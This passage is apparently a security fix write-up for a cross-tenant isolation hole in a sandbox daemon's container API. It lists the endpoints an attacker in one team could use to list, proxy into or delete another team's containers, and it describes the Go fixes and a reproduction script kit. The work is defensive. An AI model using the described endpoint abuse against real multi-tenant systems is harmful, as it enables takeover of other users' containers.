2. `GET`/`POST` the expose/unexpose/pin/list-ports endpoints against a Team B container ID.
3. Proxy live HTTP/WebSocket traffic into a Team B container via `/api/sandbox/proxy/{container}/{port}/...`.
4. `DELETE /api/sandbox/containers/{id}` to destroy a Team B container (takeover).

The correct, tenant-aware path (`buildPGSessionRegistry`) already existed and was used elsewhere (e.g. `sandboxBackendForRequest`, `network_denial_check.go`), but the container-management handlers never routed through it.

## The "Incus legacy / personal" situation

There is **no separate personal mode at the daemon level** anymore. The Astonish **daemon is always platform**:

- "Personal" only describes running the platform **on localhost with SQLite** (vs. multi-tenant PostgreSQL). The persistence/implementation is platform in both cases.
- The only thing that truly runs in a non-platform "personal" way is the local `astonish` **code** CLI — not the daemon we are fixing here.
- Therefore the team-scoped platform session store (PostgreSQL, or SQLite on localhost) is the **single source of truth**, and the local JSON registry (`sandbox.NewSessionRegistry()`) is **legacy** in the daemon context. Any remaining reference to "personal mode" around it is legacy code.

This matters because of a second, subtler bug uncovered while fixing the first: the **Incus container-creation path had never been migrated to platform mode**. In `pkg/launcher/chat_factory.go`, the `BackendKindK8s`/`OpenShell` chat path already built the PG team registry, but the legacy `BackendKindIncus` branch unconditionally used `sandbox.NewSessionRegistry()` (the pod-local JSON file registry) to register newly created session containers.

Once the handlers' **read** side was pointed at the team-scoped platform registry (fix #1), this created a **read/write store split** on Incus:

- **Write** (agent run creates the container) → legacy JSON file registry.
- **Read** (`GET /api/sandbox/containers`) → team-scoped platform registry (empty).

So a freshly created Incus container was registered only in the file registry, and the list handler — now reading the empty platform registry — returned it as an **orphan** instead of a **container**. That broke legitimate self-service and masked the isolation fix. This was reproduced on the Incus instance: a brand-new session's container appeared under `orphans` with an empty `containers` array.

## The fixes

### 1. Read side — enforce tenant isolation in sandbox handlers (`ed10e6fa`)

Introduced a request-scoped helper in `pkg/api/sandbox_backend.go`:

```go
func sandboxSessionRegistryForRequest(r *http.Request) (*sandbox.SessionRegistry, error) {
    if reg := buildPGSessionRegistry(r.Context()); reg != nil {
        return reg, nil // platform: team-scoped registry (PG, or SQLite on localhost)
    }
    return sandbox.NewSessionRegistry() // legacy fallback only when tenant ctx is absent
}
```

Because scoping happens at the registry layer, all lookups (`List`, `ResolveSessionID`, `GetContainerName`, `Get`, destroy/expose paths) are automatically confined to the caller's team.

Rerouted every affected handler through the helper:

- `pkg/api/sandbox_handlers.go` — list, delete, expose, unexpose, pin, list-ports, plus **status** (was leaking the global container count) and **prune** (was a cross-tenant destructive orphan prune using a mismatched file store).
- `pkg/api/sandbox_proxy.go` — proxy handler (routes traffic into a container by ID); removed the now-unused `sandbox` import.
- `pkg/api/session_handlers.go` — legacy Incus artifact-read fallback (`readFromSandboxContainer`) that fetched files by session ID.

Deliberately left unchanged (analyzed, not vulnerable): the two `run_handler.go` PDF/slides browser closures and `fleet_sandbox_wiring.go` (operate on the running agent's **own** session ID, not attacker-supplied IDs), and `network_denial_check.go` (already tenant-scoped with a single-tenant fallback).

### 2. Write side — wire Incus creation to the team-scoped platform registry (`4b82712d`)

In `pkg/launcher/chat_factory.go`, the `BackendKindIncus` branch now builds the team-scoped platform registry exactly like the K8s branch: resolve org/team from context (defaulting org to `GetDefaultOrgSlug()` and team to `"general"`), cast `svc.Platform` to `store.SandboxSessionProvider`, and build via `NewSessionRegistryFromStore(SandboxSessionsForTeam(...))`. It falls back to the legacy `NewSessionRegistry()` only when tenant context is genuinely absent.

Now both sides use the same team-scoped store, so a user sees exactly their own team's containers under `containers`, and cross-tenant IDs resolve to nothing.

> **Note:** the write-side change only affects sandboxes created **after** deploying this build. Containers created by the pre-fix build remain registered in the legacy file store and will appear as orphans until re-created (or pruned).

## Reproduction kit

Added a rerunnable kit under `tests/security/cross-tenant-sandbox/` (numbered scripts + shared `_lib.sh` + README). `.env` and `.state/` are gitignored so no credentials/tokens are committed.

- `00-check-backend.sh` — detects Incus vs K8s (documents why K8s is not exploitable via this path).
- `01`/`02` — victim (Team B) and attacker (Team A) login.
- `03` — victim baseline container list.
- `04` — **first proof:** attacker sees the victim's container (VULNERABLE) vs. absent (FIXED).
- `05`–`08` — cross-tenant list-ports / expose / proxy / delete (delete gated by `CONFIRM_DESTROY`).
- `09` — cleanup.

## Verification

- `go build ./...` — clean
- `go vet ./pkg/api/... ./pkg/launcher/...` — clean (only pre-existing unrelated `console.go` warnings)
- `go test ./pkg/api/... ./pkg/launcher/...` — pass
- `golangci-lint run pkg/api/... pkg/launcher/...` — 0 issues

### Post-deploy manual check

1. Rebuild + redeploy the daemon.
2. As the victim (Team B), start a fresh session that creates a sandbox; wait until running.
3. `./03-victim-list-containers.sh` → container now appears under `containers` (not `orphans`).
4. `./04-attacker-list-containers.sh` → reports **FIXED** (victim container absent from Team A's list).
5. `./05`–`./08` → cross-tenant operations return not-found/forbidden.

## Files changed

- `pkg/api/sandbox_backend.go` — new `sandboxSessionRegistryForRequest` helper
- `pkg/api/sandbox_handlers.go` — 8 handler call sites rerouted
- `pkg/api/sandbox_proxy.go` — proxy handler rerouted; drop unused import
- `pkg/api/session_handlers.go` — legacy Incus artifact-read fallback rerouted
- `pkg/launcher/chat_factory.go` — Incus creation path uses team-scoped platform registry
- `tests/security/cross-tenant-sandbox/**` — reproduction kit


---

## Update — deeper root cause found in live testing (commit `49b7c5dd`)

After deploying commits 1–2 against a real PostgreSQL Incus daemon, the victim's freshly created container **still** appeared as an orphan in their own listing. Inspecting the live DB (`astonish_wjw3p6_myorg`) proved why: the victim's container was written to the **`team_general`** schema while the victim's real team is **`test-b`** (so `team_test-b` was empty, and the read side correctly found nothing there).

### Why it landed in `team_general`

The Studio chat agent — and its sandbox `NodeClientPool` — is constructed **once, lazily, on the first chat request** (`studio.go`, `SetStudioChatInitFunc`) and then **shared across every team** for the life of the daemon process. Commit 2 bound the pool's session registry (and org/team) at that construction time, defaulting the team to `"general"` when the first request lacked tenant context. Every team's containers were therefore persisted into whichever team schema was resolved first, while the tenant-scoped `list/delete/expose/proxy` handlers read the caller's real team schema. Net effect: a user's own container was invisible to them (showed as an orphan), and the "fix" was effectively writing everyone into one shared schema.

### The correct fix — resolve tenant per session, not per pool

- `NodeClientPool` gains a `registryResolver (org,team) -> *SessionRegistry` and a per-session `sessionScopes` map, set via `SetRegistryResolver` / `SetSessionScope`. `GetOrCreate*` uses the resolved team registry + slugs for the session's `LazyNodeClient`, falling back to the pool default only when no scope was recorded. `Alias` propagates the parent's scope to sub-agent sessions; `Remove`/`Cleanup` drop scopes.
- `ToolNodePool` gains `SetSessionScope`; `nodePoolAdapter` forwards it. `backendPool` (K8s/OpenShell) and `singleClientPool` (fleet) implement it as documented no-ops (their registry is bound inside the `Backend` / at fleet wiring time).
- `NodeTool.getClientFromContext` resolves org/team from the live request context (`store.OrgSlugFromContext` / `TeamSlugFromContext`) and calls `SetSessionScope` **before** `GetOrCreate*`, so the container record lands in the caller's own team schema.
- `chat_factory` Incus branch no longer binds a single team at construction; it installs the per-session resolver over the platform `SandboxSessionProvider` and keeps only a last-resort local fallback registry.

New unit tests cover: scope propagation from context, no-scope when slugs are absent, and the pool selecting the resolver-provided registry over its default.

### Note on K8s/OpenShell

The same "bound-at-first-request" pattern exists latently for the backend-agnostic pools, but their session store is resolved inside the `Backend` (not swappable per session), and this cross-tenant path is not reachable there (handlers 503 in `sandboxConnect()` first). `SetSessionScope` is a documented no-op for those pools; a per-session fix for them is a separate follow-up.

### Verification

- `go build ./...`, `go test ./pkg/sandbox/... ./pkg/launcher/... ./pkg/api/...`, and `golangci-lint run` on the touched packages all pass.
- Requires redeploy; then a fresh victim session should list its container under `containers` (in `team_test-b`), and the attacker listing should report FIXED.
